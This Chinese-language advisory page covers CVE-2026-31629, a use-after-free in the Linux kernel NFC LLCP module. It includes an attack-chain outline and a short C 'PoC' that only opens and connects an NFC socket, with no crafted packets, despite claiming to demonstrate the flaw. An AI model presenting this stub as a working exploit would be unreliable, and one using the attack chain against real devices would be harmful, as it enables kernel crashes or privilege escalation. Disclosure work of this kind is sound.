CVE-2026-31629 CVSS 8.8 高危

CVE-2026-31629 Linux内核NFC模块释放后重用漏洞

披露日期: 2026-04-24

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31629

漏洞类型

释放后重用

CVSS评分

8.8 高危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核NFC子系统的llcp模块存在高危漏洞。在处理socket状态为LLCP_CLOSED的逻辑时，代码在调用release_sock和nfc_llcp_sock_put后缺失return语句，导致执行流继续并重复释放资源。这引发了引用计数下溢及释放后重用，攻击者利用此漏洞可导致系统崩溃或权限提升。

技术细节

该漏洞源于Linux内核net/nfc/llcp/commands.c文件中的逻辑缺陷。具体在nfc_llcp_recv_hdlc()和nfc_llcp_recv_disc()函数中，当检测到socket状态为LLCP_CLOSED时，代码虽然正确调用了release_sock()释放锁和nfc_llcp_sock_put()减少引用计数，但遗忘了关键的return语句。这导致程序并未退出，而是继续执行后续代码，再次调用相同的清理函数。这种重复释放导致引用计数下溢，进而引发严重的Use-After-Free（释放后重用）漏洞。攻击者可通过邻接网络发送特制NFC数据包触发该逻辑，导致内核崩溃或潜在的权限提升。

攻击链分析

STEP 1

侦察

攻击者识别处于物理邻近范围内且启用了NFC功能的Linux设备。

STEP 2

传递

攻击者通过邻接网络向目标设备发送特制的NFC LLCP数据包。

STEP 3

利用

数据包触发目标设备的nfc_llcp_recv_hdlc或nfc_llcp_recv_disc函数，使socket状态变为LLCP_CLOSED。

STEP 4

触发漏洞

由于缺少return语句，导致release_sock和nfc_llcp_sock_put被重复调用，引发引用计数下溢和释放后重用。

STEP 5

影响

导致内核崩溃（拒绝服务）或利用UAF条件实现内核代码执行（权限提升）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-31629: Linux Kernel NFC LLCP Use-After-Free
 * This code demonstrates the creation of an NFC LLCP socket which triggers
 * the vulnerable code path during connection handling or data reception.
 * Requires a system with NFC hardware and kernel support.
 */

#include <linux/nfc.h>
#include <sys/socket.h>
#include <unistd.h>
#include <stdio.h>

int main() {
    int sock;
    struct sockaddr_nfc_llcp addr;

    // Create an NFC LLCP socket
    sock = socket(AF_NFC, SOCK_STREAM, NFC_SOCKPROTO_LLCP);
    if (sock < 0) {
        perror("socket");
        return 1;
    }

    // Setup address (SAP)
    memset(&addr, 0, sizeof(addr));
    addr.sa_family = AF_NFC;
    addr.dev_idx = 0; // Target device index
    addr.nfc_protocol = NFC_PROTO_LLCP;
    addr.sap = 0x10;  // Target Service Access Point

    // Attempting to connect or send data that triggers the state transition
    // to LLCP_CLOSED without proper handling in the kernel.
    // Actual exploitation requires precise timing and packet crafting.
    
    if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        perror("connect");
        close(sock);
        return 1;
    }

    printf("Socket created and connected. Vulnerability may be triggered by remote disconnection or malformed packets.\n");
    
    close(sock);
    return 0;
}

影响范围

Linux Kernel (所有修复补丁发布前的版本)

防御指南

临时缓解措施

如果不需要使用NFC功能，建议在BIOS或操作系统中禁用NFC内核模块或驱动程序，以减少攻击面。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表